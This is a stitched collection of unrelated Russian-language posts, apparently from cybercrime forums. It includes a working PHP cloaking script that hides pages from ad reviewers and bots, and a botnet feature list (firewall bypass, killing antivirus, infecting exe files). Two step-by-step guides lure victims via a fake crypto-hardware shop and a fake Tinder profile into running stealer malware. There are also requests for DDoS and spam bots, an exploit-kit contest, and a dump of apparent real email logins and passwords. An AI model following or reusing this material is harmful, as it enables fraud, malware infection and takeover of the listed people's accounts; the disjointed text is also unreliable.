Всем привет, часто начал замечать, что сейчас массово покупают аккаунты Reddit. Может кто знает, насколько сложно там запустить рекламную кампанию или как там все устроено. По моему оферу Google ADS вообще не дает установок, поэтому решил узнать за Reddit.
Помню был топик, где народ изъявил желание создать сеть для распределенных вычислений (брут MD5 и др.). В общем, щас решил заняться созданием данной сети, пока что ваяю каркас. Отписываемся сюда, какие функции в ней хотим видеть. И т.д., мнения пожелания, нужна ли вообще эта сеть и т.д.
Дубль темы с експы/topic/179960/
Имею многолетний опыт в теории со времен славпоха и его клоаки, олды поймут. В
практике с год уже.
Отвечу на вопросы новичков так же буду рад пообщаться с олдами.
Клоаку рекомендую Hide.click ( не реклама ) на дамаге есть мой топик о том как
клоачить ищи в разделе фишинг.
Погнали.
Большой материал для новичков и для тех, кто уже имеет представление о том,
что такое дорвеи и хочет улучшить свои результаты.
Огромное количество полезного материала под CPA ниши.
**Содержание мануала:
⦿ Выбор вертикали (дейтинг, гэмблинг, адалт и тд);
⦿ Сбор ключевых фраз (даются разные базы);
⦿ Создание дорвеев, изучение доргенов;
⦿ Индексация страниц;
⦿ Наставления и рекомендации.
You must have at least 1 reaction(s) to view the content.
**
Здарова уже любимые форумчане)) почему уже? да потомучто я не так уж долго тут зарегистрирован)
Сидел тут и гулял по интернету и от безделья решил сделать что то полезное для своих дамаглабцев)))
Долго и не грамотно писать не буду))))
Так вот
Нынче найти живой траффик это проблема , многие льют с бирж многие льют с
шелов , кстати счас вы скажете да ну накуй эти биржы там одно г*вно , вы почти
правы , так вот с шелов трафф нормальный получается , а что делать нам если мы
не умеем ломать сайты и заливать шелы ?
- Читать дальше статью))))))))))))
Вообщем то что я предлагаю это вместо шелов купить сами сайты с траффиком.... Ведь шелы при не грамотном использовании могут уплыть далеко далеко))))
Spoiler: 200
1. Идем на godaddy
2. Domains
3. Browse Auctions
4. Popular Searches - A-Z listings
5. Sort By - All listings
6. Жмем на Traffic Внизу( получаем список доменов по убыванию траффика )
Покупаем например домен avos.info за 250 $ , паркуем где нибудь , вешаем фрейм и льем, на домене 94к траффика по данным godaddy
Итог
Получилось что мы купили 94к траффика за 250 баксов .... льем траффик пока не уложим домен в листы АВ =)
Создать 2 файла:
index.php
PHP:Copy to clipboard
<?php
error_reporting(0);
### CONFIG ###
$CHECK_IPS_KEY = "key_free";
$work = 1; # 1 - ON / 0 - OFF, all send bad_reguest
$good_url = "http://www.google.com/"; # URL send OK
##############
###
function good_reguest($good_url){
header('Location: '.$good_url);
exit();
}
#
function bad_reguest(){
include "bad_reguest.php";
exit();
}
###
###
if($work == 0){
bad_reguest();
exit();
}
###
###
$GLOBAL_IP = $_SERVER['REMOTE_ADDR'];
$GLOBAL_UA = urlencode($_SERVER['HTTP_USER_AGENT']);
#
$CHECK_IPS_KEY = "key_free";
$CHECK_IPS_API_BOT = "http://checkbot.check-ips.net/".$CHECK_IPS_KEY."/ip/".$GLOBAL_IP;
###
if( ### Check USER_AGENT
strpos($GLOBAL_UA, urlencode('http://')) !== false ||
strpos($GLOBAL_UA, urlencode('Catchpoint')) !== false ||
strpos($GLOBAL_UA, urlencode('Python')) !== false ||
strpos($GLOBAL_UA, urlencode('Crawler')) !== false ||
strpos($GLOBAL_UA, urlencode('Spider')) !== false ||
strpos($GLOBAL_UA, urlencode('crawler')) !== false ||
strpos($GLOBAL_UA, urlencode('spider')) !== false ||
strpos($GLOBAL_UA, urlencode('Bot')) !== false ||
strpos($GLOBAL_UA, urlencode('BOT')) !== false ||
strpos($GLOBAL_UA, urlencode('bot')) !== false ||
strpos($GLOBAL_UA, urlencode('ips-agent')) !== false ||
strpos($GLOBAL_UA, urlencode('zgrab')) !== false ||
strpos($GLOBAL_UA, urlencode('Netcraft')) !== false ||
strpos($GLOBAL_UA, urlencode('BingPreview')) !== false ||
strpos($GLOBAL_UA, urlencode('evc-batch')) !== false ||
strpos($GLOBAL_UA, urlencode('Wget')) !== false ||
strpos($GLOBAL_UA, urlencode('CheckHost')) !== false ||
strpos($GLOBAL_UA, urlencode('HostTracker')) !== false ||
strpos($GLOBAL_UA, urlencode('Wappalyzer')) !== false ||
strpos($GLOBAL_UA, urlencode('Hstpnetwork')) !== false ||
strpos($GLOBAL_UA, urlencode('Genieo')) !== false ||
strpos($GLOBAL_UA, urlencode('Yahoo')) !== false ||
strpos($GLOBAL_UA, urlencode('A6-Indexer')) !== false ||
strpos($GLOBAL_UA, urlencode('Windows NT 5.2')) !== false
#ADD MORE
){
bad_reguest();
} else {
if ( ### Check CHECK_IPS_API_BOT
strpos(file_get_contents($CHECK_IPS_API_BOT), 'BOT') !== false
){
bad_reguest();
} else {
good_reguest($good_url);
}
}
exit();
?>
bad_reguest.php (сюда можно положить оригинальный код вашего лендинга для аппрува, дефолт код ниже)
PHP:Copy to clipboard
<?php
header("HTTP/1.0 404 Not Found");
echo "404 Not Found";
?>
Сделано на CHECK-IPS.NET - IPs-Data API
https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/35253/
Тестил ддос бота Illusion на днях. Почему после определенного времени пребывания ботов в он-лайне, они уходят в офф,несмотря на то,что сам комп на котором они висят по-прежнем находятся в инете? От чего зависит время ухода ботов в офф? У кого такое было?
Part I [ Создание инфраструктуры под накрутку ПФ ]
Здравствуйте, Господа. Вот и настал тот день когда все светочи нашей команды собрались и наконец то выкатили сео "монстра" для накрутки поведенческих факторов. В данный момент - вся наша кухня проходит тестирование, есть ряд задач и проблем - решения которых мы опишем в продолжении этих статей.
Click to expand...
С Вами на связи Azcord и мы начинаем
Что такое поведенческие факторы:
Начнем мы эту историю из далека - какого черта нас вообще интересуют ПФ и что
это вообще такое? Просвещенные сразу могут пролистать эту часть статьи, но мне
ведь нужно как-то подвести повествование к практической части.
И так, ПФ - що это? Поведенческие факторы есть — удовлетворенность
информацией, совокупность положительных/отрицательных паттернов поведения
пользователя на поисковой выдачи, так и внутри конкретного сайта. Исходя из
этого, мы можем прийти к умозаключению, что эти паттерны можно накручивать и в
теории достаточно легко. Почему?
Яндекс - это про деньги. И это отличные новости.
Поведенческие факторы имеют очень много системного шума.
Основным фактором ранжирования в Яндексе сейчас есть — ПФ
Раз ситуация выглядит таким образом, грешно этим не пользоваться, не так ли?
Ведь поисковая система заинтересована в удовлетворенности пользователей от результата поиска и ранжирует веб-страницы таким образом, чтобы удовлетворенность постоянно росла.
Click to expand...
Окей, нам нужно понять от куда Яндекс подсасывает информацию?
Есть три основных источника , но стоит понимать, что это далеко не все. Поисковик учитывает все сигналы которые может извлечь из поведения. Сейчас же остановимся на трех основных, а остальные будем изучать в процессе тестов.
1. Поисковая выдача ( результаты поиска )
Любая поисковая система следит за своей выдачей, она наблюдает за тем, куда мы
переходим, как долго задерживаемся на странице, как мы вводим мышкой и т.д всю
эту информацию она собирает из результатов поиска.
2. Браузеры
В пример возьмем гугл. У гугла есть браузер хром, а еще у гугла есть платформа
андроид, и уже давно не секрет, что гугл за нами следит. Всю информацию с этих
источников, уходить напрямую в дата центры.
3. Сервисы веб-аналитики и прочие
Тут все просто, Яндекс-метрика - внутри которой есть свой антифрод, а на
поисковой выдачи свой. Сюда бы я еще вписал остальные сервисы яндекс,
например: Яндекс Карты, Яндекс бизнес.
Ага, это мы выяснили. Следствие - мы можем разделить ПФ условно на две составляющие:
Внешние факторы:
CTR — показатель кликабельности
Идея примитивная до жути, нам нужно чтобы пользователь кликал на сайт.
Останавливаться на идеях расширенного Featured Snippet, проработке description
и погрузки адекватного favicon - оставим
Длина клика — показатель оценивающий время между переходом на страницу и
возвращением в поисковую выдачу.
Показатель страниц открытых в одном сеансе — количество открытых страниц в
одном сеансе.
Последний клик — показатель завершенности поисковой сессии.
( Этот пункт по моему субъективному мнению где-то посередине, его как и все
остальные мы рассмотрим подробнее в процессе тестов )
Внутренние факторы:
Длительность сеанса — время проведенное на сайте.
Показатель отказов — кол-во пользователей покинувшие страницу.
Глубина перехода — количество открытых страниц внутри сайта.
Конверсионные действия — не требует пояснений
Наверняка есть и другие факторы которые я упустил на сегодня из виду, ну что же, будем изучать это дерьмо в режиме реального времени. Собственно факторы описанные выше мы и будем крутить.
Что нам для этого потребуется?
1. Нам нужен софт , на сейчас у меня есть три варианта которые я выделил для себя. Два из которых написаны на BAS ( кому-то жаль тех кто крутит на басе, правда никто толком не говорит почему, добре, мы это выясним на практике )
Список:
WebVisiter
- Только ленивый про него не знает, купить можно здесь:
https://t.me/arxatpro
RedBull
- Менее известный, но так же можно найти в паблике ( начнем с него )
Поделюсь ссылкой с разрешения разраба.
Termidroid Network
- Привлек мое внимание, подробности можно изучить здесь:
https://************/discussion/thr...pf-do-20-vizitov-besplatno-
ezhednevno.104189/
**Для начала пойдет, едем дальше
2. Нам необходимо железо на которое мы поставил софтину.**
Тут есть три очевидных варианта:
-Минимальные системные требования для более менее комфортной работы:
В общем дороговато, не так ли? Так или иначе сервак с подобными характеристиками можно найти в пределах 150-200$. А то и лучше по характеристикам.
Примерная цена за характеристики нашего сервера:
Это вообще пиздец...
Купить север/заказать сервер
- Есть вас не пугают космические цены-это вполне приемлемый вариант,
стукнется вам это счастье примерно в 3000-4000$
Что нам может предложить рынок? В целом у нас есть два варианта:
Алиэкспресс
Плюсы:
- достаточно демократичные цены
- большой выбор
Минусы:
- очень долгая доставка (1-2 месяца)
- если придет брак, то это снова тратить большое количество времени на
возврат/замену
Плюсы:
- можно купить и все собрать за пару дней
- какие никакие гарантии, если покупаете что то в магазине
Минусы:
- очень скудный выбор, серверное оборудование не купишь в ближайшем днс,
нужно искать специализированные магазины, что не в каждом городе есть, либо же
прочесывать авито в поисках удачных вариантов (Кстати б/у процы и оперативки
можно смело брать, если они не перегревались (что в принципе очень сложно
сделать), то они в полном порядке, все это дело необходимо проверить через тот
же memtest или аиду)
- ну и самый главный минус, вытекающий из первого - цена (в магазинах все
комплектующие с али будут раза в 1,5 дороже)
Мы решили собирать свой сервак:
1. Процессор - забываем сразу же про типичные интел и райзен из днс (для
наших целей цена не оправдано высока), самое главное, нам важно количество
физических ядер и потоков, чем больше тем лучше, на частоту процессора нам
фиолетово, т.к. программы наши требуют именно многопоточность, рендирингом
видосов мы не собираемся заниматься
Хороший выбор будет в пользу E52696v3/4
https://aliexpress.ru/wholesale?SearchText=Xeon+2696
Цена: 12-20к x 2 = 24-40к
2. Материнская плата - под наши процы берем двухпроцессорную материнку на
сокете LGA2011
Выбор пал в сторону MACHINIST X99 D8, так как нашел несколько сборок сервака с
хорошими отзывами именно на ней
https://aliexpress.ru/wholesale?SearchText=MACHINIST+X99+D8
Цена: 12-20к
Как сказал знакомый сис админ главное обратить внимание на конденсаторы проца, чтоб они не перегревались, хорошо так же зайдет в сборку платы от supermicro, но их еще нужно найти
Так же нужно не подъебаться с размером корпуса для нее, размер платы EATX - влезет далеко не в каждый корпус, а если и влезет могут не сойтись отверстия для крепления. Нашел на авито старенький, но хороший Thermaltake tai-chi
Цена: 10кClick to expand...
3. Оперативная память - решили брать сразу с запасом 256гб серверную память от самсунга
https://aliexpress.ru/item/4000770450335.html?sku_id=12000022479258044
Взяли 8 плашек по 32гб с частотой 2133
Цена: 30к
4. SSD - берем чисто под систему и важные проги 500гб
https://aliexpress.ru/item/1005003677576454.html?sku_id=12000028078678061
Цена: 6к
5. Жесткий диск - в зависимости от ваших потребностей выбирать объем.
Мы взяли два серверных по 16тб
https://aliexpress.ru/item/1005004526810186.html?sku_id=12000029479594581
Цена: 45к
6. Процессорный куллер
https://aliexpress.ru/item/1005002366025350.html?sku_id=12000029400957896
Цена: 3-6к
7. Блок питания - выбираем хороший, с запасом, чтоб он не работал постоянно
на 100%, мы взяли голдовский deepcool на 800 Ватт в ближайшем ДНС
Самое главное, у нас двух процессорная мать, а значит должно быть два питания
на процессор и смотрим длину кабеля, который идет на проц, он не всегда может
дотянутся и придется покупать переходник
Цена: 9-10к
8. Видеокарта - берем какую нибудь затычку с авито
Цена: 2к
После того, как приобрели все комплектующие - собрали, в этом ничего сложного, в интернете полно доступных мануалов, в крайнем случае любой мастер вам соберет за условные 50-100$
У нас при сборке единственная трудность возникла в том, что пк не включался и все время ругался на память, но в итоге запустился, как позже выяснили методом тыка, у нас не стабильно работала одна плашка памяти.
Устанавливаем винду, серверную или 10 pro, ниже не имеет смысла ставить, так как не будет поддерживать два проца, к 10 кстати тоже можно удаленно подключаться.
Так как мы не электрики, то решили обезопасить себя по максимуму, взяли еще ИБП (источник бесперебойного питания), в случае замыкания можно будет не беспокоится о всем подключенном оборудовании к нему, так же у него есть аккумуляторы, если произойдет отключение электричества у вас будет время на корректное закрытие софта и сохранение данных
Цена: 30кClick to expand...
К нашему ИБП воткнули еще сетевой фильтр, на всякий случай
Общая сумма: где-то 2к баксов вместе со всеми комплектующими. Короче
3. Создание прокси фермы
Немного математики:
1 мобильная прокся ( приват ) стоит 2500 - да еще не факт, что она приватная,
но это уже другая история. Исходя из характеристик сервера мы можем
расчитывать минимум на 100 проксей. 100 x 2500 = 250к в месяц, четверть
ляма...
К этому мы условно еще можем прибавить кэш за аренду сервера в 60-70к...
Не комильфо, а если откровенно - это пиздец. Как вы уже поняли, по 320к/месяц
платить я не хочу. Что делать? Собрать свою прокси ферму. О_о да, у кого-то
будет секс.
Начинаем изучать тему, что нам потребуется?
1. Нам нужен еще один сервачек на которым будет развернута сеть. Здесь в
целом ничего критичного, по этому купим какую-нибудь залупу под тесты на авито
в приделах 150-200$ с следующими характеристиками:
Минимум проц с 6 физическими ядрами + 6 виртуальных
Оперативы гигов 8-16 ГБ
Тут мы его немного апгрейдили, но в целом ничего интересного. К серваку который держит ферму так же был докуплен ИПБ.
2. Далее нам нужны прошитые модемы. Мое зоркий глаз остановился на модемах хуевей е3372 и
хуевей е3372 - 30шт по 2500 = 75к
хуевей е3376 - 30шт по 1500 = 45к
Итог на модемы ушло: 120000р
3. В модемах как вы, наверное, догадались должны находиться симки.
Под модемы я нашел 30 симок стоимостью 1200р x 30 = 36000р ( оператора
оставить за кулисами ) с безлимитным интернетом 250р/месяц
Дополнительно были закуплены еще два оператора по 15шт с стоимость 500р, 500 x
30 = 15000р с безлимитным интернетом в 500-550р/месяц
А теперь посчитаем сколько стоит в прокся при наличии фермы 22 - 25к за ферму
в 60 портов, черт с ним когда увеличим кол-во проксей до 100 эта сумма будет
едва ли доходит до 35к/месяц. 35к рублей даже близко не стоит рядом с 250к...
4. Ах да, модемы же нужно куда-то вставлять.
Поэтому заранее был куплен хаб на 30портов ORICO вместе со всем железом. За
10к, от которого в последствии пришлось избавиться и заменить на SIpolar на 20
портов каждый.
- Приобрел 3 хаба Sipolar на 20 портов по 100$ за каждый. 300$
5. Далее на всех модемах нужно поменять Ip по типу 144.75.*.100, заместо звездочки любое число, главное, чтобы у каждого модема оно было уникальное и настроить ротацию
Ну и здесь началась ебля... Именно на процессе настройки фермы
очень долго ебались , так как во всех мануалах в интернете рекомендуют
программу 3proxy, то пытались сначала ее установить, далее нормально настроить
ротацию ip.
В итоге угробив несколько недель и денег на проггера, который даже в один момент предложил уже тупо написать свой скрипт, на выходе мы нашли два готовых варианта:
https://bablosoft.com/shop/SwitchStation - скрипт на две машины с максимальным кол-ом подключений 20 устройств.
https://kraken-proxy.ru/ - этот вариант оказался более лояльный, итог мы взяли его.
Программа максимально понятная, есть мануалы по настройке модемов, есть
саппорт, честно говоря который не особо сговорчив, даже за денюжку
В целом достаточно установить прогу на убунту, зайти, создать и настроить
“профили модемов”, после уже на них поднимать прокся.
Сейчас будет небольшая выжимка информации и советов, расскажу про трудности, и проблемы на решение которых у нас ушли месяцы.
1. Не берите хаб orico, есть свои проблемы с питанием и портами, долго выявляли эту проблему, заменили его на промышленный хаб Sipolar на 20 портов, теперь все четко.
Чтобы модемы не наебнусь быстро, рекомендую снимать корпуса и ставить все это дело под кондер. В общем обеспечить необходимую температуру. У нас на данном момент ферма расположена в неотапливаемом помещении, на сегодня не паримся по этому направлению, но скоро....
- так же сигнал могут улучшить специальные антенны для модемов, после подключения качество сигнала улучшилось более чем.
Далее
- поменять прошивку модема, нам это очень помогло, сигнал с одной красной полоски вырос до стабильных 3-4
До смены прошивки
После смены прошивки
Теперь вернемся к проблемам который нам пока не удалось решить.
1. Отваливаются модемы, есть две гипотезы почему так происходит:
А. Есть просадка напряжения по всему дому... Следствие - ферме не хватает
питания и модемы отлетают как семечки. Из 30 подключенных модемов, стабильно
работают 24.
Б. Мать сервера которая обеспечивает работу ферме не вывозит такое кол-ви
активных USB подключений. Соответственно модемы отваливаются.
В целом, осталось надеть только носки.... И все запуститься, тестирование прошло +- успешно за исключением, полной реализации всей доступной мощности...
Возможности:
1. Пинг, Урл ддос. Последнюю можно юзать для накрутки трафика.
2. Назначение бботам отдельных заданий
3. Обход файрвола через доверенный процесс - svchost.exe(по умолчанию)
4. Многопоточность.
5. Невидимость в процессах.
6. Нестандартная автозагрузка.
7. Закачка файлов.
8. У каждого бота свой уникальный ключ. Который можно изменить при
форсированной перерегистрации.
9. Установка выбранного вами файла на ддос серверы.
10. Выполнение команд.
11. Посылка сообщения.
12. Заражение exe фалйлов
13. Убивать злые процессы
14. Убивать каспера
15. Убивать не нужные сервисы
16. Рассылка по найденным емейлам
17. Если его потерут из реестра то он автоматом прописывается в
реестре(проверка каждые 10 секунд)
18. Все это в 13 килобайтах.
Spoiler: 3 у вас 43
Ранее сабж продавался по 300 баков. Давали мне на проверку когда-то демку. Щас смотрю в пабл попал.
Год назад работал небольшой командой (3 человека) по буржу в теме емейл спама.
Сами добывали базы, слали по ним, траф монетизировали партнерками.
В откровенную чернуху не лезли принципиально, хотя со многим знакомы.
В основном работали под бинарку.
Чуть позже, из-за разногласий развалилилсь, а знания и софтец для всего этого
К чему это я..
Могу в этом топике отвечать на вопросы связанные с емейл спамом, добычей
качественных емейл баз,
добычей smtp корпов и последующей монетизацией трафика, если эта тема кому-то
интересна.
Не обещаю, что отвечать буду быстро.
Если кто-то захочет ознакомиться более детально с этой темой - можете писать в
ЛС или жабу:
agrex@exploit.im
smtpspam@shangryla.net
Сидел и вспоминал как это правильно делается.
Вообщем суть. Есть iframe вида
Code:Copy to clipboard
<iframe src="http://site.ru/tds/image.jpg" hspace="0" vspace="0" frameborder="0" border="0" framespacing="0" marginwidth="0" marginheight="0" style="border-style: solid; border-width: 0px; width: 100%; height: 100%" width="100%" height="100%"></iframe>
По адресу http://site.ru/tds/image.jpg лежит обычный php файл. Нужно было
что-то прописать вроде в .htaccess чтобы jpg обрабатывался как php. НО нужно
чтобы это правило действовало только в этой папке и не распространялось на
вложенные, где лежит сам шаблон tds.
Кто напомнит подробности - с меня +
Спасибо.
Всем авторам связок предлагается принять участие в сравнительном обзоре на звание самой лучшей связки.
Ваши связки будут оцениваться мной (Ar3s) и DeusTirael.
Критерии оценки:
1. Простота установки
2. Функционал
3. Удобство интерфейса
4. Пробив (тесты всех связок пройдут на одинаковом трафике)
5. Отстук (будем сравнивать количество пробитых машин и количество
отстучавшихся ботов. Прогружаемый файл для всех связок одинаков.)
6. Качество кода (Проводит DeusTirael. Сравнивается точность подсчета
пробитых машин, количество выявленных косяков о коду, будет произведена
публикация выявленных косяков, после уведомления о них авторов и пары дней
ожидания на их исправление, или рапорта автора о устранении косяка.)
7. Качество крипта. (Virtest)
Для участия в конкурсе вы должны предоставить нам рабочую версию связки,
запрещается использование ионкубера или иных подобных обфускаторов. В случае
несогласия автора с изучением исходников будут рассматриваться варианты приема
на конкурс связок "под обфускатором", но с условием, что никакие действия по
изучению кода производиться не будут и об этом будет указано в финальной
таблице.
Кроме того, нам потребуется проверить вашу связку на чистоту выдачи. Поэтому
участие авторов в данном нюансе приветствуется. Нам никоим образом не хочется
самолично вносить изменения в работу системы.
Я гарантирую всем авторам, что кроме меня и DeusTirael ваши детища никто не
увидит. Ни исходников, ни систем "в работе". В финальном обзоре будут лишь
скриншоты и ссылки на результат АВ проверки.
Так же приветствуется внедрение в тело связки нестандартной переменной,
которая будет лишь в выданном мне варианте связки. Дабы вы в случае "утечки"
были уверены, что это произошло не по нашей вине.
Последний срок приема заявок - 22 сентября 2009 года.
Любые предложение по данному обзору - приветствуются. Все обсуждения будут абсолютно прозрачны, дабы меня не обвиняли в предвзятом отношении к кому- нибудь.
Собственно хотел поинтересоватся какие боты сейчас используют люди сидящин на
дамдже.
В частности интересуют спам боты, и ддос боты.
Хотелось бы увидеть описание ваших ботов.
И конгечно если можно билдер или исходники.
Просто, ранее не собирался ставить ботнет.
А сегодня что то задумался об этом.
Кто может помочь отпишите.
Всем привет, совсем недавно я угнал 3.8 эфира в первый день запуска.
Достаточно давно специализируюсь в спаме, фб, гугле, но реальная разводка
которая сработала по таргету пришла ко мне спустя только 3 года.
Я буду краток и попытаюсь четко донести для тех кому это действительно нужно.
Starter pack:
1.1 - Использовать стиллер можно абсолютно любой, главное чтобы стукнул "да и
крипт особо даже не нужен", я не буду рекламировать те инструменты которыми я
пользовался в меру определенных причин, но скажу что всё это можно достать в
паблике.
1.2 - Ленд делаете под свою тематику, можете "Скопипастить и перевести на
АНГЛ/ЯЗ, мне попался мамонтенок именно из сферы крипты, я понимаю что если
человек хочет купить себе асики то у него есть биток или эфир и я был прав,
1/4 лидов был с бабосом, банки я не чекаю не интересно. На ленде снижаете на
максимум цены до лояльного предела и убираете кнопки "Купить", ставите кнопку
"Обратная Cвязь" и ведите лидов на левый ватсап , создайте полное понимание
что вы не наёберы и деньги на сайте не хотите тянуть.
Сайт не мой поставил как пример, но суть ясна.
1.3 - try.elama.ru - обращаетесь в подобную компанию и говорите им какой вы
пиздатый продавец и вам нужен траффик на ленд, заносите им бабос с карты
дропа. "Картинка справа"
1.4 - Человек со знанием английского поможет вам отрабатывать лидов которые
хотят купить асик и заразить их exe файлом.
Важное примечание: попросите дизайнера сделать макет программы якобы вашего приложения, это понадобится для дальнейшего диалога с мамонтом.
1.5 - Переводите мамонтов в ватсап, как правило вам придёт сообщение от мамонта: "Здравствуйте заинтересован в вашем товаре, как я могу его приобрести", ну или что-то подобное, тут уже как ваша фантазия сработает. Не нужно многословить, ваша задача чтобы он скачал - "exe,iso,apk", сразу грузите его подобным сообщение: Здравствуйте, вся нужная информация и весь каталог товаров находится на нашем Удобном новостом портале и отправляете ссылку на прямую скачку exe, прикладывая макет из примечание.
Можно использовать много разводок но суть обратной связи шикарна как никогда)
Всем профитов и шикарного настроения !)
Всем привет, как хорошо что в наше время, можно найти девушку или парня как на
ночь так и на всю жизнь, для отношений, работы, время провождения.
Сегодня как раз о работе)
Данная статья показывает как благодаря Tinder , можно заманить жирного
мамонта к себе на проект или подпихнуть ему exe,apk.
Начинаем …..
Для начало, через онлайн смс регистрируем наш аккаунт в тиндер, юзать можем любое гео, ну лучше конечно же USA
Примечание : ВПН под страну по которой будете хасанить
После того как вы прошли регистрацию, указали номер телефона и почту,
начинается заполнение аккаунта.
В пиндосии все сошли с ума, поэтому ставим «Не определилась» какой вы
ориентации, это вам «+», больше тухлодырых на вас клюнет.
В данной статье, я буду доминировать над мужчинами.
Теперь выставляем ваши интересы, создаем реальную шалаву, но с головой, даём понять что отношения нам не нужны, а только перепихон.
Баскетбол, слабость Америки, ну и негритят подтянете на сходку.
Кого мы хотим найти? ПАПИКА, ставим возраст от 30 до 75 и не брезгаем, в наше время дед с закалкой доставит вам больше удовольствия, чем «не определившийся в ориентации мальчишка».
Далее переходим в настройки и ставим ваше гео, USA.
кстати, забыл сказать, потратится прийдется , 5$ на премиум аккаунт)
Проходим верификацию: отрисовка привет, придаёт полную уверенность что ты реальная и готова отблагодарить мужчину.
Я поставил на фотографии красивую девчонку, которую нашёл в паблике в вк, фотки из 2006 года не вариант, берите сочную молодую славянку, таких там очень любят.
Выставляем ссылку на наш скам проект если это «криптоскам» в описании и пишем:
работа моей мечты.
Если же вы двигаете ехе, уводите мамонта в другой месенджер, заводите с ним
роман и отправляйте ему свои «интимки» в архиве. По фото вы легко поймёте,
жирный ли это мамонт и да, не тратьте время на бомжей без верификации.
Пример фото богатенького:
Донат на кальян можно закинуть сюда:
USDT TRC20
TEgcWypXUMFiBDjuYnqitmDLutjZnPe7y1
Всем спасибо.
Привет,
хотел бы быть полезным для форума, хочу поделится сайтами, которыми пользуюсь
для поиска курсов - возможно кому пригодится.
Есть очень большое количество как по арбитражу/ маркетингу так и безопасности,
бизнесу итд., часть курсов видел здесь на форуме.
На 2х чтобы открыть все ссылки - просят небольшой единоразовый взнос, на 1
пока что все бесплатно (англ. сегмент).
Если создатели сервисов здесь на форуме - спасибо за работу!
Список сайтов, которыми пользуюсь:
You must have at least 1 reaction(s) to view the content.
Добрый вечер! Вопрос по генерации трафика на dating сайт. Кто может
проконсультировать?
Нужно мужчин с Англии, Австралии, Америки и Канады привлекать на сайт. На
сайте реализована реферальная программа 20% с их пополнений. Готов обсудить
условия сотрудничества, кто готов взяться.
!нарыл я тут на своем компе пару прог для отправки смс по инету!ну и как
всегда одна не работает другая не обслуживает нужных операторов!!подкинте пару
сылок на проги (желательно что бы работали) =) спс
П.С еще меня интересуют такие проги как смс-убийцы !посылает смску в 16-р виде
спомощью которой телефон зависает или выключается ! кто что знает ?
Ваш логин - {vlad@raid.ru} , пароль - test
Ваш логин - {saturn-r@pi.ccl.ru} , пароль - Epfhtym
Ваш логин - {KasimovA@dzerbank.perm.ru} , пароль - my
Ваш логин - {killer@raid.ru} , пароль - schl0ss
Ваш логин - {vml@raid.ru} , пароль - 1
Ваш логин - {michaelb@raid.ru} , пароль - 646931
Ваш логин - {danplus@perm.raid.ru} , пароль - qgulkvru
Ваш логин - {tau@raid.ru} , пароль - alex
Ваш логин - {andre@perm.raid.ru} , пароль - andre
Ваш логин - {chagin@perm.raid.ru} , пароль - fsfjqnzv
Ваш логин - {tornado@perm.raid.ru} , пароль - qwer
Ваш логин - {alextwla@perm.raid.ru} , пароль - 72777
Ваш логин - {dial@perm.raid.ru} , пароль - МЕЛШЯКХЛШИ
Ваш логин - {kontur@perm.raid.ru} , пароль - mansmcro
Ваш логин - {kirill@perm.raid.ru} , пароль - 13894679
Ваш логин - {michael@raid.ru} , пароль - hfccskrf
Ваш логин - {sigma@perm.raid.ru} , пароль - qwerty
Ваш логин - {IVAN@PERMREG.AC.RU} , пароль - GORDON
Ваш логин - {smart@ecology.psu.ru} , пароль - kos321
Ваш логин - {kamaneft@perm.raid.ru} , пароль - fbuuhnet
Ваш логин - {sus@perm.raid.ru} , пароль - pdheqrvs
Ваш логин - {sdobri@perm.raid.ru} , пароль - panasonic
Ваш логин - {shs@permonline.ru} , пароль - powder
Ваш логин - {elen@perm.raid.ru} , пароль - helen
Ваш логин - {igr@raid.ru} , пароль - igr
Ваш логин - {lenhof@perm.raid.ru} , пароль - aacchu1i
Ваш логин - {finder@perm.raid.ru} , пароль - kkawsmpk
Ваш логин - {checkletsoff@hotmail.com} , пароль - xcom
Ваш логин - {roman@icmm.ru} , пароль - jkty`yjr
Ваш логин - {ten@perm.raid.ru} , пароль - zx
Ваш логин - {press@perm.raid.ru} , пароль - maxim
Ваш логин - {rustam@perm.raid.ru} , пароль - lddfueqr
Ваш логин - {mikh@perm.raid.ru} , пароль - 16061952
Ваш логин - {aga@perm.raid.ru} , пароль - aerihcnl
Ваш логин - {kolosvg@perm.raid.ru} , пароль - nxvwewus
Ваш логин - {farid@perm.raid.ru} , пароль - celinemylove
Ваш логин - {nomad@perm.raid.ru} , пароль - ymwmxdrc
Ваш логин - {cool@perm.raid.ru} , пароль - qwerty9
Ваш логин - {markov@perm.raid.ru} , пароль - slave
Ваш логин - {alx@perm.raid.ru} , пароль - stranger
Ваш логин - {vedern1@psu.ru} , пароль - VLADY
Ваш логин - {foodtrade@perm.raid.ru} , пароль - demid
Ваш логин - {leon@perm.raid.ru} , пароль - kajdowur
Ваш логин - {gleb@energo.perm.ru} , пароль - 673618
Ваш логин - {dmirtyr@perm.raid.ru} , пароль - 140370
Ваш логин - {ipvitaly@perm.raid.ru} , пароль - vitaly
Ваш логин - {rim@perm.raid.ru} , пароль - kafwmqlh
Ваш логин - {gulin@perm.raid.ru} , пароль - fktyrf
Ваш логин - {dvn@perm.raid.ru} , пароль - 22227542
Ваш логин - {alexeym@raid.ru} , пароль - ЯРЕЙКН
Ваш логин - {jupiter@permonline.ru} , пароль - ra
Ваш логин - {kirillov@perm.raid.ru} , пароль - aanowmma
Ваш логин - {arseny@perm.raid.ru} , пароль - 1978
Ваш логин - {zobov@perm.raid.ru} , пароль - anhiqcny
Ваш логин - {adma@ccl.ru} , пароль - qqq
Ваш логин - {kdp@raid.ru} , пароль - S.S.Esses
Ваш логин - {asb@perm.raid.ru} , пароль - mgbblsxk
Ваш логин - {plotnikov@guta.ru} , пароль - 458256
Ваш логин - {osix@perm.raid.ru} , пароль - c935a1g0
Ваш логин - {afedorov@perm.raid.ru} , пароль - aanguove
Ваш логин - {toropov@psu.ru} , пароль - to1896le
Ваш логин - {kudrinsky@usa.net} , пароль - syscmos
Ваш логин - {stars@pi.ccl.ru} , пароль - olegH
Ваш логин - {ankol@perm.raid.ru} , пароль - hump
Ваш логин - {farmacon@pi.ccl.ru} , пароль - Sq8VWDYH
Ваш логин - {boyscout@perm.raid.ru} , пароль - verbatim
Ваш логин - {irishka@permonline.ru} , пароль - demon
Ваш логин - {sintez@perm.raid.ru} , пароль - ksuvrkil
Ваш логин - {raduga@pi.ccl.ru} , пароль - QKvKBWTO
Ваш логин - {sergey@permreg.ac.ru} , пароль - polli
Ваш логин - {Sav@perm.raid.ru} , пароль - tolik
Ваш логин - {kap@pi.ccl.ru} , пароль - XHLL5JQi
Ваш логин - {leonid@permonline.ru} , пароль - wwkgyuet
Ваш логин - {slav@pi.ccl.ru} , пароль - unkr48
